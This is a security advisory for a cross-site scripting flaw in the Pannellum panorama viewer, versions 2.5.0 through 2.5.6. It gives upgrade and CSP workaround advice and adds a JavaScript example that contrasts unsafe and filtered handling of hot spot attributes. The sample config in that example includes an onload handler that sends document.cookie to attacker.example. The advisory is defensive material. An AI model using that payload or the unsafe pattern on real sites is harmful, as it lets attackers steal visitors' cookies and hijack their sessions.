mpetroff pannellum
cpe:2.3:a:pannellum:pannellum:*:*:*:*:*:*:*
- 2.5.0
- 2.5.1
- 2.5.2
- 2.5.3
- 2.5.4
- 2.5.5
- 2.5.6
A cross-site scripting (XSS) vulnerability has been identified in Pannellum, a web-based panorama viewer, affecting versions 2.5.0 through 2.5.6. The issue arises from the hot spot "attributes" configuration property: every key in that object was applied to the hot spot element without any filtering of attribute names, so a config could add HTML event handler attributes (onload, onmouseover and similar). The existing escapeHTML protection does not help here because it escapes attribute values as HTML, while the browser consumes an event handler attribute's value as JavaScript. Websites are affected if they serve the standalone viewer HTML file with a config URL an untrusted party can choose, or if they load hot spot configuration from untrusted JSON. Some of the injectable events fire without any user interaction, so arbitrary JavaScript runs as soon as the hot spot is rendered and can rewrite page content so that it appears to originate from the hosting website.
Exploitation of this vulnerability allows cross-site scripting: the attacker's JavaScript executes in the victim's browser in the origin that hosts the viewer. It can be used to manipulate page content or to read anything that origin exposes, such as cookies not marked HttpOnly or data stored for that origin.
Users should upgrade to Pannellum version 2.5.7, where this vulnerability has been fixed. As a workaround, a Content-Security-Policy header that includes the directive script-src-attr 'none' blocks execution of inline event handler attributes. Note that script-src-attr is a CSP Level 3 directive; browsers that do not implement it fall back to script-src, so that fallback directive must not allow 'unsafe-inline' for the workaround to be effective. Independently of the fix, Pannellum should be hosted on an origin that does not share cookies or other ambient credentials with the authenticated parts of a site (for example a separate domain), which limits what any XSS in the viewer can reach.
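The following is an added example, not Pannellum's own code, illustrating the mechanism described above: copying a hot spot "attributes" object onto an element verbatim versus filtering attribute names first, plus the CSP string the workaround relies on. The minimal element stand-in, the hot spot config and the allow-list of attribute names are constructed for the example; the allow-list is an assumption and is not the set Pannellum 2.5.7 uses.

```javascript
// Added example (not Pannellum's own code). Runs in Node without a browser:
// the element below is a stand-in that records setAttribute calls, on the
// assumption that the real viewer sets each configured attribute with
// element.setAttribute(name, value).
function makeElement() {
  const attrs = {};
  return {
    attrs,
    setAttribute(name, value) { attrs[name] = String(value); },
  };
}

// Constructed hot spot config, as an untrusted JSON file could supply it.
// Two of the keys are HTML event handler attributes.
const untrustedHotSpot = {
  pitch: 14.1,
  yaw: 1.5,
  type: "info",
  text: "Roof",
  attributes: {
    "title": "Roof",
    "data-room": "attic",
    "onload": "fetch('https://attacker.example/?c=' + document.cookie)",
    "ONMOUSEOVER": "alert(1)",
  },
};

// Vulnerable pattern: every key is set verbatim. onload/onmouseover land on
// the element and the browser runs their values as JavaScript. Escaping the
// value as HTML would not change that, because the value is never parsed as
// HTML; it is handed to the script engine.
function applyAttributesUnsafe(el, attributes) {
  for (const name of Object.keys(attributes)) {
    el.setAttribute(name, attributes[name]);
  }
  return el;
}

// Hardened pattern: reject any event handler attribute (case-insensitive
// "on" prefix, since HTML attribute names are case-insensitive) and only
// accept names from a small allow-list plus data-* attributes.
const ATTRIBUTE_ALLOW_LIST = new Set(["title", "class", "id", "lang", "dir"]);

function isEventHandlerName(name) {
  return /^on/i.test(name);
}

function isAllowedAttributeName(name) {
  const lower = name.toLowerCase();
  if (isEventHandlerName(lower)) return false;
  return ATTRIBUTE_ALLOW_LIST.has(lower) || /^data-[a-z0-9-]+$/.test(lower);
}

function applyAttributesSafe(el, attributes) {
  const rejected = [];
  for (const name of Object.keys(attributes)) {
    if (isAllowedAttributeName(name)) {
      el.setAttribute(name, attributes[name]);
    } else {
      rejected.push(name);
    }
  }
  return { el, rejected };
}

// Defence in depth: the CSP workaround from the advisory. script-src-attr
// 'none' disables inline event handler attributes; script-src 'self' is the
// fallback older browsers apply, and it must not contain 'unsafe-inline'.
function cspHeaderForViewer() {
  return "script-src 'self'; script-src-attr 'none'";
}

// Stand-alone demonstration.
const unsafe = applyAttributesUnsafe(makeElement(), untrustedHotSpot.attributes);
console.log("unsafe element attributes:", unsafe.attrs);
const safe = applyAttributesSafe(makeElement(), untrustedHotSpot.attributes);
console.log("safe element attributes:", safe.el.attrs, "rejected:", safe.rejected);
console.log("Content-Security-Policy:", cspHeaderForViewer());
```

The name filter is the important half: escaping values, as escapeHTML does, is the right control for text that becomes HTML, but an attribute whose name selects a script context needs to be refused outright, not escaped.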